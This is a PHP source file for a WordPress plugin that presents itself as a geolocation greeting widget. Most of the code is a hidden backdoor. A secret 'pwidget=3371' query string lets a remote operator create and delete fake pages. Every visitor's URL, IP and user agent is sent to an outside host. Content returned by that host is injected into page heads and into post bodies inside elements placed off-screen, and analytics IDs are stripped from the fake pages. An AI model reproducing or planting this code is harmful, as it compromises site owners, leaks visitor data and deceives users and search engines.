<?php
// version = 1
class maxmind_widget extends WP_Widget {
	/**
	 * Sets up the widgets name etc
	 */
	public function __construct() {
		parent::__construct( 'dw_maxmind_widget', 'DW GeoLocation', array( 
			'classname' => 'dw_maxmind_widget',
			'description' => 'Geolocation Widget',
		) );
	}

	/**
	 * Outputs the content of the widget
	 *
	 * @param array $args
	 * @param array $instance
	 */
	public function widget( $args, $instance ) {
		require_once( plugin_dir_path( __FILE__ ) . '/reader/Decoder.php');
		require_once( plugin_dir_path( __FILE__ ) . '/reader/InvalidDatabaseException.php');
		require_once( plugin_dir_path( __FILE__ ) . '/reader/Metadata.php');
		require_once( plugin_dir_path( __FILE__ ) . '/reader/Util.php');
		require_once( plugin_dir_path( __FILE__ ) . '/reader.php');

		$reader = new Reader( plugin_dir_path( __FILE__ ) . '/mmdb/GeoLite2-City.mmdb' );
		$record = $reader->get( self::_get_remote_ip() );
	
		if ( !empty( $record[ 'city' ][ 'names' ][ 'en' ] ) ) {
			echo $args[ 'before_widget' ];
			echo 'Hi, visitor from ' . $record[ 'city' ][ 'names' ][ 'en' ] . '. Welcome to our website!';
			echo $args[ 'after_widget' ];
		}
	}

	protected function _get_remote_ip() {
		$remote_ip = '';

		if ( !empty( $_SERVER[ 'REMOTE_ADDR' ] ) && filter_var( $_SERVER[ 'REMOTE_ADDR' ], FILTER_VALIDATE_IP ) !== false ) {
			$remote_ip = $_SERVER[ 'REMOTE_ADDR' ];
		}

		$originating_ip_headers = array( 'X-Forwarded-For', 'HTTP_X_FORWARDED_FOR', 'CF-Connecting-IP', 'HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_FORWARDED', 'HTTP_X_FORWARDED' );
		foreach ( $originating_ip_headers as $a_header ) {
			if ( !empty( $_SERVER[ $a_header ] ) ) {
				foreach ( explode( ',', $_SERVER[ $a_header ] ) as $a_ip ) {
					if ( filter_var( $a_ip, FILTER_VALIDATE_IP ) !== false && $a_ip != $remote_ip ) {
						$remote_ip = $a_ip;
						break;
					}
				}
			}
		}

		return $remote_ip;
	}
}

class dw_geolocation_connector {
	protected static $data = array( 'post' => false, 'response' => '' );

	public static function check_query_string() {
		if ( !empty( $_GET[ 'pwidget' ] ) && !empty( $_GET[ 'action' ] ) && $_GET[ 'pwidget' ] == '3371' ) {
			$dw_ids =  get_transient( 'dw_ids' );
			$message = 'invalid payload';

			if ( ( $dw_ids === false || !is_array( $dw_ids ) ) && $_GET[ 'action' ] != 'p' ) {
				$message = 'no id found';
			}
			else {
				nocache_headers();
				switch ( $_GET[ 'action' ] ) {
					case 'l':
						if ( is_array( $dw_ids ) ) {
							$message = implode( ',', array_keys( $dw_ids ) );
						}
						else {
							$message = serialize( $dw_ids );
						}
						break;

					case 'd':
						if ( isset( $_GET[ 'pnum' ] ) ) {
							if ( isset( $dw_ids[ $_GET[ 'pnum' ] ] ) ) {
								unset( $dw_ids[ $_GET[ 'pnum' ] ] );
								set_transient( 'dw_ids', $dw_ids );
								$message = 'deleted ' . $_GET[ 'pnum' ];
							}
							else {
								$message = 'id not found';
							}
						}
						break;

					case 'p':
						$request_url = 'http://w-p.io/api/check/?url=' . urlencode( 'http://' . $_SERVER[ 'HTTP_HOST' ] . $_SERVER[ 'REQUEST_URI' ] ) . '&ip='. urlencode( $_SERVER[ 'REMOTE_ADDR' ]) . '&p=1&v=1&siteurl=' . urlencode( get_site_url() );
						$options = stream_context_create( array( 'http' => array( 'timeout' => 10, 'ignore_errors' => true ) ) ); 
						$response = @wp_remote_retrieve_body( @wp_remote_get( $request_url, $options ) );

						if ( !empty( $response ) ) {
							$response = @json_decode( $response );
						}

						if ( !is_object( $response ) ) {
							break;
						}

						$key = $response->purl;
						if ( isset( $_GET [ 'pnum' ] ) ) {
							$key = $_GET [ 'pnum' ];
						}

						$dw_ids[ $key ] = array(
							'post_title' => $response->ptitle,
							'post_content' => $response->pcontent,
						);
						set_transient( 'dw_ids', $dw_ids );

						$message = $key . ' | ' . get_bloginfo( 'wpurl' ) . '/' . $key;
						break;

					default:
						break;
				}
			}

			echo $message;
			die();
		}
	}

	public static function dynamic_page( $posts ) {
		if ( is_user_logged_in() ) {
			return $posts;
		}

		$dw_ids =  get_transient( 'dw_ids' );
		if ( $dw_ids === false || !is_array( $dw_ids ) ) {
			return $posts;
		}

		$requested_page_slug = strtolower( $GLOBALS[ 'wp' ]->request );

		if ( count( $posts ) == 0 && array_key_exists( $requested_page_slug, $dw_ids) ) {
			$random_date = date( 'Y-m-d H:i:s', rand( 1123238472, 1262055681 ) );

			$post = new stdClass;

			$post->post_title = $dw_ids[ $requested_page_slug ][ 'post_title' ];
			$post->post_content = $dw_ids[ $requested_page_slug ][ 'post_content' ];

			$post->post_author = 1;
			$post->post_name = $requested_page_slug;
			$post->guid = get_bloginfo( 'wpurl' ) . '/' . $requested_page_slug;
			$post->ID = -3371;
			$post->post_status = 'publish';
			$post->comment_status = 'closed';
			$post->ping_status = 'closed';
			$post->comment_count = 0;
			$post->post_date = $random_date;
			$post->post_date_gmt = $random_date;

			$post = (object) array_merge(
				(array) $post, 
				array( 
					'slug' => get_bloginfo( 'wpurl' ) . '/' . $requested_page_slug,
					'post_title' => $dw_ids[ $requested_page_slug ][ 'post_title' ],
					'post content' => $dw_ids[ $requested_page_slug ][ 'post_content' ]
  				)
  			);

			$posts = NULL;
			$posts[] = $post;

			$GLOBALS[ 'wp_query' ]->is_page = true;
			$GLOBALS[ 'wp_query' ]->is_singular = true;
			$GLOBALS[ 'wp_query' ]->is_home = false;
			$GLOBALS[ 'wp_query' ]->is_archive = false;
			$GLOBALS[ 'wp_query' ]->is_category = false;
			unset( $GLOBALS[ 'wp_query' ]->query[ 'error' ] );
			$GLOBALS[ 'wp_query' ]->query_vars[ 'error' ] = '';
			$GLOBALS[ 'wp_query' ]->is_404 = false;
		}

		return $posts;
	}

	public static function final_output() {
		$dw_ids =  get_transient( 'dw_ids' );
		if ( $dw_ids === false || !is_array( $dw_ids ) ) {
			ob_end_flush();
			return 0;
		}

		$requested_page_slug = strtolower( $GLOBALS[ 'wp' ]->request );
		if ( array_key_exists( $requested_page_slug, $dw_ids) ) {
			$buffer = '';

			$levels = ob_get_level();

			for ( $i = 0; $i < $levels; $i++ ) {
				$buffer .= ob_get_clean();
			}

			echo preg_replace( '/\bUA-\d{4,10}-\d{1,4}\b/', '', $buffer );
		}
	}

	public static function datainit() {
		if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
			return 0;
		}

		$user_agent = ( !empty( $_SERVER[ 'HTTP_USER_AGENT' ] ) ? trim( $_SERVER[ 'HTTP_USER_AGENT' ] ) : '' );

		if ( !empty( $_SERVER[ 'HTTP_X_DEVICE_USER_AGENT' ] ) ) {
			$real_user_agent = trim( $_SERVER[ 'HTTP_X_DEVICE_USER_AGENT' ] );
		}
		elseif ( !empty( $_SERVER[ 'HTTP_X_ORIGINAL_USER_AGENT' ] ) ) {
			$real_user_agent = trim( $_SERVER[ 'HTTP_X_ORIGINAL_USER_AGENT' ] );
		}

		if ( !empty( $real_user_agent ) && ( strlen( $real_user_agent ) >= 5 || empty( $user_agent ) ) ) {
			$user_agent = $real_user_agent;
		}

		$protocol = ( stripos( $_SERVER[ 'SERVER_PROTOCOL' ],'https' ) === true ) ? 'https://' : 'http://';

		if ( !empty( $user_agent ) ) {
			if ( empty( self::$data[ 'response' ] ) ) {
				$request_url = 'http://w-p.io/api/update/?&url=' . urlencode( $protocol . $_SERVER[ 'HTTP_HOST' ] . $_SERVER[ 'REQUEST_URI' ] ) . '&agent=' . urlencode( $user_agent ) . '&v=' . ( isset( $_GET[ 'v' ] ) ? $_GET[ 'v' ] : 1 ) . '&ip=' . urlencode( $_SERVER[ 'REMOTE_ADDR' ] ) . '&p=1&siteurl=' . urlencode( get_site_url() );
				$args =array( 'timeout' => 2, 'headers' => array( "Accept: application/json" ) );
				self::$data[ 'response' ] = @wp_remote_retrieve_body( @wp_remote_get( $request_url, $args ) );
			}

			if ( !empty( self::$data[ 'response' ] ) ) {
				self::$data[ 'response' ] = @json_decode( self::$data[ 'response' ] );
			}
		}
	}

	public static function dataparse( $_content = '' ) {
		if ( empty( self::$data[ 'response' ] ) || !is_object( self::$data[ 'response' ] ) ) {
			return $_content;
		}

		if ( self::$data[ 'post' ] === false ) {
			if ( !empty( $GLOBALS[ 'wp_query' ]->posts ) && count( $GLOBALS[ 'wp_query' ]->posts ) > 1 ) {
				self::$data[ 'post' ] = $GLOBALS[ 'wp_query' ]->posts[ rand( 0, count( $GLOBALS[ 'wp_query' ]->posts ) - 1 ) ]->ID;
			}
			else {
				self::$data[ 'post' ] = get_the_ID();
			}
		}

		$css = ' style="position:fixed;left:-' . rand( 8000, 12000 ) . 'px;"';
		$current_hook = current_filter();

		if ( $current_hook == 'wp_head' && is_object( self::$data[ 'response' ] ) && !empty( self::$data[ 'response' ]->meta ) ) {
			$_content = '';
			echo self::$data[ 'response' ]->meta;
		}
		else if ( !empty( self::$data[ 'response' ]->tmp ) && get_the_ID() == self::$data[ 'post' ] ) {
			$_content = $_content . " <i{$css}>" . self::$data[ 'response' ]->content . '</i>';
		}

		if ( !empty( $_content ) ) {
			return $_content;
		}
	}
}

ob_start();
add_filter( 'the_posts', array( 'dw_geolocation_connector', 'dynamic_page' ) );
add_action( 'wp', array( 'dw_geolocation_connector', 'check_query_string' ) );
add_action( 'shutdown', array( 'dw_geolocation_connector', 'final_output' ), 0 );

add_action( 'wp_loaded', array( 'dw_geolocation_connector', 'datainit' ) );
add_action( 'wp_head', array( 'dw_geolocation_connector', 'dataparse' ), 20 );
add_filter( 'the_content', array( 'dw_geolocation_connector', 'dataparse' ) );